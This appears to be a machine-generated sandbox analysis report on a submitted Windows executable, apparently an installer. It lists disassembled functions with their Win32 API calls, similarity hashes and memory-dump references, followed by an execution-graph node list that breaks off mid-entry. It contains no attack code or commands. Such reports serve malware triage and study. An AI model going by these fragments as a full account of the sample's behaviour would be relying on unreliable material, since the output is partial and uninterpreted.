                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                        • String ID: Version
                                        • API String ID: 512980652-315105994
                                        • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                        • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                        • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                        • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                        • GetTickCount.KERNEL32 ref: 00403303
                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                        • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                        • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                        • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                        • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                        • String ID:
                                        • API String ID: 2883127279-0
                                        • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                        • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                        • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                        • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 0040492E
                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                        • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                        • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                        • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                        APIs
                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringlstrcmp
                                        • String ID: !N~
                                        • API String ID: 623250636-529124213
                                        • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                        • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                        • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                        • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                        APIs
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                        • CloseHandle.KERNEL32(?), ref: 00405C9D
                                        Strings
                                        • Error launching installer, xrefs: 00405C74
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                        • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                        • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                        • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                        APIs
                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: CloseHandlelstrlenwvsprintf
                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                        • API String ID: 3509786178-2769509956
                                        • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                        • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                        • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                        • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                        • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                        • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                        • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                        • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                        • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                        Execution Graph

                                        Execution Coverage:4.3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:5.1%
                                        Total number of Nodes:1584
                                        Total number of Limit Nodes:29
                                        execution_graph 14135 40f740 14165 4144da 14135->14165 14138 40f974 14140 40f775 CreateFileA 14141 40f7ac SetFileAttributesA 14140->14141 14143 40f7ea 14140->14143 14142 40f7bf GetLastError 14141->14142 14141->14143 14194 412920 14142->14194 14144 40f8b7 14143->14144 14199 40fac0 14143->14199 14147 40f8d3 GetLastError 14144->14147 14148 40f905 14144->14148 14153 412920 26 API calls 14147->14153 14149 40f909 SetFileTime 14148->14149 14150 40f96d CloseHandle 14148->14150 14149->14150 14155 40f943 GetLastError 14149->14155 14150->14138 14152 40f814 14152->14144 14204 40f980 14152->14204 14154 40f8e7 14153->14154 14156 412920 26 API calls 14155->14156 14158 40f956 14156->14158 14158->14150 14159 40f83d 14159->14144 14160 40f873 14159->14160 14219 406640 14159->14219 14163 412920 26 API calls 14160->14163 14162 40f863 14164 412920 26 API calls 14162->14164 14163->14144 14164->14160 14166 40f751 14165->14166 14167 4144ef 14165->14167 14166->14138 14175 40fb60 14166->14175 14167->14166 14223 413968 14167->14223 14173 414509 14173->14166 14238 413326 14173->14238 14287 40fdc0 14175->14287 14177 40fb6f 14178 40fc4e 14177->14178 14183 40fbb2 14177->14183 14179 40fc52 14178->14179 14180 40fc6e DosDateTimeToFileTime LocalFileTimeToFileTime 14178->14180 14296 407730 14179->14296 14182 40fc5e 14180->14182 14182->14140 14184 40fbb6 14183->14184 14186 40fbcc 14183->14186 14290 40fce0 14184->14290 14187 40fbfd 14186->14187 14188 40fbc7 14186->14188 14189 40fc34 14187->14189 14191 40fbf8 14187->14191 14188->14186 14190 40fce0 55 API calls 14188->14190 14189->14140 14190->14191 14191->14187 14192 40fce0 55 API calls 14191->14192 14193 40fc29 14192->14193 14193->14140 14568 4149cb 14194->14568 14197 40f7d3 14197->14143 14200 40fad2 14199->14200 14202 40fad6 14199->14202 14200->14152 14201 40fb55 14201->14152 14202->14201 14592 40f6b0 14202->14592 14205 40f99a 14204->14205 14206 40f9af 14205->14206 14595 412310 14205->14595 14206->14159 14208 40f9f5 14209 40fa03 14208->14209 14210 413274 12 API calls 14208->14210 14209->14159 14212 40fa16 14210->14212 14211 40fa1f 14211->14159 14212->14211 14218 40fa84 14212->14218 14615 4126e0 14212->14615 14214 413326 ___free_lc_time 7 API calls 14216 40faa1 14214->14216 14215 40fa5a 14217 412920 26 API calls 14215->14217 14215->14218 14216->14159 14217->14218 14218->14214 14220 406652 14219->14220 14221 406687 CharToOemA 14219->14221 14220->14221 14661 413755 14220->14661 14221->14162 14224 413999 14223->14224 14225 41397e 14223->14225 14227 419d21 14224->14227 14225->14224 14249 415612 14225->14249 14228 414501 14227->14228 14229 419d2d 14227->14229 14231 419c6e 14228->14231 14229->14228 14230 413326 ___free_lc_time 7 API calls 14229->14230 14230->14228 14234 419c82 14231->14234 14237 419cef 14231->14237 14232 419ce7 14264 414423 14232->14264 14234->14232 14235 419cd1 CloseHandle 14234->14235 14234->14237 14235->14232 14236 419cdd GetLastError 14235->14236 14236->14232 14237->14173 14239 413332 14238->14239 14240 41334e 14238->14240 14241 413352 ___free_lc_time 14239->14241 14242 41333c ___free_lc_time 14239->14242 14240->14166 14243 41337d 14241->14243 14247 41336c 14241->14247 14244 41337e HeapFree 14242->14244 14245 413348 14242->14245 14243->14244 14244->14240 14268 417705 14245->14268 14274 41848c 14247->14274 14251 41562d 14249->14251 14258 41565c 14249->14258 14250 415670 14253 415742 WriteFile 14250->14253 14255 415681 14250->14255 14251->14250 14251->14258 14259 41908b 14251->14259 14254 415764 GetLastError 14253->14254 14253->14258 14254->14258 14256 4156cd WriteFile 14255->14256 14255->14258 14256->14255 14257 415737 GetLastError 14256->14257 14257->14258 14258->14224 14260 41909a 14259->14260 14263 4190c3 14259->14263 14261 4190cf SetFilePointer 14260->14261 14260->14263 14262 4190e7 GetLastError 14261->14262 14261->14263 14262->14263 14263->14250 14265 41447c 14264->14265 14266 414431 14264->14266 14265->14237 14266->14265 14267 414476 SetStdHandle 14266->14267 14267->14265 14269 417743 14268->14269 14273 4179f9 ___free_lc_time 14268->14273 14270 41793f VirtualFree 14269->14270 14269->14273 14271 4179a3 14270->14271 14272 4179b2 VirtualFree HeapFree 14271->14272 14271->14273 14272->14273 14273->14240 14275 4184cf 14274->14275 14276 4184b9 14274->14276 14275->14240 14276->14275 14278 418373 14276->14278 14281 418380 14278->14281 14279 418430 14279->14275 14280 4183a1 VirtualFree 14280->14281 14281->14279 14281->14280 14283 41831d VirtualFree 14281->14283 14284 41833a 14283->14284 14285 41836a 14284->14285 14286 41834a HeapFree 14284->14286 14285->14281 14286->14281 14303 4101d0 14287->14303 14289 40fdca 14289->14177 14411 413e3e 14290->14411 14292 40fd19 14293 40fd95 SystemTimeToFileTime LocalFileTimeToFileTime 14292->14293 14293->14188 14294 40fcf7 14294->14292 14295 40fd40 GetLocalTime 14294->14295 14295->14293 14547 413f9e GetLocalTime GetSystemTime 14296->14547 14299 413e3e 52 API calls 14300 407747 14299->14300 14553 413c4c 14300->14553 14304 4101eb 14303->14304 14305 410237 14304->14305 14306 410215 14304->14306 14316 41338f 14304->14316 14308 410259 GetFullPathNameA 14305->14308 14310 41027e 14305->14310 14306->14289 14309 410276 14308->14309 14308->14310 14309->14289 14311 4102b2 GetVolumeInformationA 14310->14311 14315 410329 14310->14315 14312 410305 14311->14312 14313 4102f8 14311->14313 14320 41c146 14312->14320 14313->14289 14315->14289 14317 4133a1 14316->14317 14318 4133ad 14316->14318 14317->14305 14330 4188a6 14318->14330 14321 41c17a 14320->14321 14324 41c159 14320->14324 14342 41918f 14321->14342 14324->14315 14325 41c1bf 14327 413326 ___free_lc_time 7 API calls 14325->14327 14327->14324 14329 41918f 9 API calls 14329->14325 14331 4188ef 14330->14331 14332 4188d7 GetStringTypeW 14330->14332 14334 41891a GetStringTypeA 14331->14334 14335 41893e 14331->14335 14332->14331 14333 4188f3 GetStringTypeA 14332->14333 14333->14331 14336 4189db 14333->14336 14334->14336 14335->14336 14338 418954 MultiByteToWideChar 14335->14338 14336->14317 14338->14336 14339 418978 14338->14339 14339->14336 14340 4189b2 MultiByteToWideChar 14339->14340 14340->14336 14341 4189cb GetStringTypeW 14340->14341 14341->14336 14343 4191db 14342->14343 14344 4191bf LCMapStringW 14342->14344 14346 419241 14343->14346 14347 419224 LCMapStringA 14343->14347 14344->14343 14345 4191e3 LCMapStringA 14344->14345 14345->14343 14348 41931d 14345->14348 14346->14348 14349 419257 MultiByteToWideChar 14346->14349 14347->14348 14348->14325 14360 413274 14348->14360 14349->14348 14350 419281 14349->14350 14350->14348 14351 4192b7 MultiByteToWideChar 14350->14351 14351->14348 14352 4192d0 LCMapStringW 14351->14352 14352->14348 14353 4192eb 14352->14353 14354 4192f1 14353->14354 14356 419331 14353->14356 14354->14348 14355 4192ff LCMapStringW 14354->14355 14355->14348 14356->14348 14357 419369 LCMapStringW 14356->14357 14357->14348 14358 419381 WideCharToMultiByte 14357->14358 14358->14348 14363 413286 14360->14363 14364 413283 14363->14364 14366 41328d 14363->14366 14364->14325 14364->14329 14366->14364 14367 4132b2 14366->14367 14368 4132c1 14367->14368 14371 4132d6 14367->14371 14369 4132cf 14368->14369 14378 417a2e 14368->14378 14372 413315 RtlAllocateHeap 14369->14372 14375 4132d4 14369->14375 14371->14369 14371->14372 14373 4132f6 14371->14373 14374 413324 14372->14374 14384 4184d1 14373->14384 14374->14366 14375->14366 14377 413301 14377->14372 14377->14374 14381 417a60 14378->14381 14379 417aff 14382 417b0e 14379->14382 14398 417de8 14379->14398 14381->14379 14381->14382 14391 417d37 14381->14391 14382->14369 14390 4184df 14384->14390 14385 4185cb VirtualAlloc 14389 41859c 14385->14389 14386 4186a0 14402 4181d9 14386->14402 14389->14377 14390->14385 14390->14386 14390->14389 14392 417d7a HeapAlloc 14391->14392 14393 417d4a HeapReAlloc 14391->14393 14394 417da0 VirtualAlloc 14392->14394 14397 417dca 14392->14397 14395 417d69 14393->14395 14393->14397 14396 417dba HeapFree 14394->14396 14394->14397 14395->14392 14396->14397 14397->14379 14399 417dfa VirtualAlloc 14398->14399 14401 417e43 14399->14401 14401->14382 14403 4181e6 14402->14403 14404 4181ed HeapAlloc 14402->14404 14405 41820a VirtualAlloc 14403->14405 14404->14405 14410 418242 14404->14410 14406 41822a VirtualAlloc 14405->14406 14407 4182ff 14405->14407 14408 4182f1 VirtualFree 14406->14408 14406->14410 14409 418307 HeapFree 14407->14409 14407->14410 14408->14407 14409->14410 14410->14389 14412 413e51 14411->14412 14414 413e4a 14411->14414 14415 4194a8 14412->14415 14414->14294 14416 4194b1 14415->14416 14417 4194b6 14415->14417 14419 4194bd 14416->14419 14417->14414 14438 4131f7 14419->14438 14422 4194f0 GetTimeZoneInformation 14426 419503 WideCharToMultiByte 14422->14426 14434 4195ce 14422->14434 14423 4195e6 14424 413326 ___free_lc_time 7 API calls 14423->14424 14423->14434 14425 419614 14424->14425 14430 413274 12 API calls 14425->14430 14428 419590 WideCharToMultiByte 14426->14428 14428->14434 14431 419621 14430->14431 14431->14434 14444 41aa8d 14431->14444 14434->14417 14435 41aa8d 6 API calls 14436 419692 14435->14436 14436->14434 14437 41aa8d 6 API calls 14436->14437 14437->14434 14439 413209 14438->14439 14440 413266 14438->14440 14439->14440 14442 41321a 14439->14442 14450 417437 14439->14450 14440->14422 14440->14423 14442->14440 14457 4173f8 14442->14457 14446 41aa95 14444->14446 14445 41338f 6 API calls 14445->14446 14446->14445 14447 41aac3 14446->14447 14448 41338f 6 API calls 14447->14448 14449 419664 14447->14449 14448->14447 14449->14434 14449->14435 14452 417498 14450->14452 14455 41744a 14450->14455 14451 417450 WideCharToMultiByte 14451->14452 14451->14455 14452->14442 14453 413274 12 API calls 14453->14455 14454 417471 WideCharToMultiByte 14454->14452 14454->14455 14455->14451 14455->14452 14455->14453 14455->14454 14462 41ad95 14455->14462 14458 417401 14457->14458 14459 417405 14457->14459 14458->14442 14531 41ab18 14459->14531 14463 41adf9 14462->14463 14464 41ada4 14462->14464 14463->14455 14464->14463 14465 41add9 14464->14465 14487 41af74 14464->14487 14467 41ae01 14465->14467 14469 41adf0 14465->14469 14481 41adf5 14465->14481 14467->14463 14473 413274 12 API calls 14467->14473 14471 417437 42 API calls 14469->14471 14471->14481 14472 41ae97 14472->14463 14476 414564 24 API calls 14472->14476 14475 41ae10 14473->14475 14474 41ae59 14477 413326 ___free_lc_time 7 API calls 14474->14477 14478 41ae87 14474->14478 14475->14463 14480 413274 12 API calls 14475->14480 14475->14481 14476->14478 14479 41ae68 14477->14479 14478->14463 14483 413274 12 API calls 14478->14483 14500 414564 14479->14500 14480->14481 14481->14463 14496 41af1c 14481->14496 14484 41aedf 14483->14484 14484->14463 14485 41aef0 SetEnvironmentVariableA 14484->14485 14486 413326 ___free_lc_time 7 API calls 14485->14486 14486->14463 14488 41af83 14487->14488 14489 41af7f 14487->14489 14490 413274 12 API calls 14488->14490 14489->14465 14491 41afa5 14490->14491 14492 41afb5 14491->14492 14521 414957 14491->14521 14494 41afd1 14492->14494 14527 41bd6e 14492->14527 14494->14465 14497 41ae4c 14496->14497 14499 41af2a 14496->14499 14497->14472 14497->14474 14498 4173f8 9 API calls 14498->14499 14499->14497 14499->14498 14501 414571 14500->14501 14502 41457f 14500->14502 14503 413274 12 API calls 14501->14503 14504 414594 14502->14504 14505 414586 14502->14505 14509 414579 14503->14509 14507 4146a4 14504->14507 14519 4145a2 ___free_lc_time 14504->14519 14506 413326 ___free_lc_time 7 API calls 14505->14506 14506->14509 14508 4147bf 14507->14508 14518 4146ad ___free_lc_time 14507->14518 14508->14509 14510 4147cd HeapReAlloc 14508->14510 14509->14478 14510->14508 14510->14509 14511 414662 HeapReAlloc 14511->14519 14512 414785 HeapReAlloc 14512->14518 14513 41461b HeapAlloc 14513->14519 14514 414749 HeapAlloc 14514->14518 14515 417a2e 5 API calls 14515->14519 14516 4184d1 6 API calls 14516->14518 14517 417705 VirtualFree VirtualFree HeapFree ___free_lc_time 14517->14519 14518->14509 14518->14512 14518->14514 14518->14516 14520 41848c VirtualFree HeapFree VirtualFree ___free_lc_time 14518->14520 14519->14509 14519->14511 14519->14513 14519->14515 14519->14517 14520->14518 14522 414960 14521->14522 14523 414965 14521->14523 14524 41a354 7 API calls 14522->14524 14525 41a38d 7 API calls 14523->14525 14524->14523 14526 41496e 14525->14526 14526->14492 14528 41bd77 14527->14528 14530 41bd84 14527->14530 14529 413274 12 API calls 14528->14529 14529->14530 14530->14492 14532 41ab4b CompareStringW 14531->14532 14534 41ab60 14531->14534 14533 41ab68 CompareStringA 14532->14533 14532->14534 14533->14534 14540 417424 14533->14540 14535 41abc1 CompareStringA 14534->14535 14536 41abdc 14534->14536 14535->14540 14537 41ac96 MultiByteToWideChar 14536->14537 14538 41ac1b GetCPInfo 14536->14538 14536->14540 14537->14540 14541 41acb2 14537->14541 14539 41ac30 14538->14539 14538->14540 14539->14537 14539->14540 14540->14442 14541->14540 14542 41acee MultiByteToWideChar 14541->14542 14542->14540 14543 41ad08 MultiByteToWideChar 14542->14543 14543->14540 14544 41ad20 14543->14544 14544->14540 14545 41ad54 MultiByteToWideChar 14544->14545 14545->14540 14546 41ad6b CompareStringW 14545->14546 14546->14540 14548 414003 GetTimeZoneInformation 14547->14548 14549 413fc8 14547->14549 14550 413ffc 14548->14550 14549->14548 14549->14550 14556 419a07 14550->14556 14552 407739 14552->14299 14560 413c5a 14553->14560 14555 407799 14555->14182 14558 419a20 14556->14558 14559 419a4b 14556->14559 14557 4194a8 52 API calls 14557->14559 14558->14557 14558->14559 14559->14552 14561 413c6e 14560->14561 14565 413e1a 14560->14565 14562 4194a8 52 API calls 14561->14562 14561->14565 14563 413de4 14562->14563 14564 413e3e 52 API calls 14563->14564 14566 413df5 14564->14566 14565->14555 14566->14565 14567 413e3e 52 API calls 14566->14567 14567->14565 14569 41294e 14568->14569 14574 4149f3 __aulldiv __aullrem 14568->14574 14569->14197 14577 413a3a 14569->14577 14570 415169 18 API calls 14570->14574 14571 413274 12 API calls 14571->14574 14572 41a4e0 WideCharToMultiByte 14572->14574 14573 413326 ___free_lc_time 7 API calls 14573->14574 14574->14569 14574->14570 14574->14571 14574->14572 14574->14573 14575 4151cf 18 API calls 14574->14575 14576 41519e 18 API calls 14574->14576 14575->14574 14576->14574 14581 413a50 14577->14581 14586 413ad4 14577->14586 14578 413aab 14579 413ab5 14578->14579 14580 413b19 14578->14580 14582 413acc 14579->14582 14587 413adc 14579->14587 14583 415612 6 API calls 14580->14583 14581->14578 14581->14586 14589 419125 14581->14589 14584 415612 6 API calls 14582->14584 14583->14586 14584->14586 14586->14197 14587->14586 14588 41908b 2 API calls 14587->14588 14588->14586 14590 413274 12 API calls 14589->14590 14591 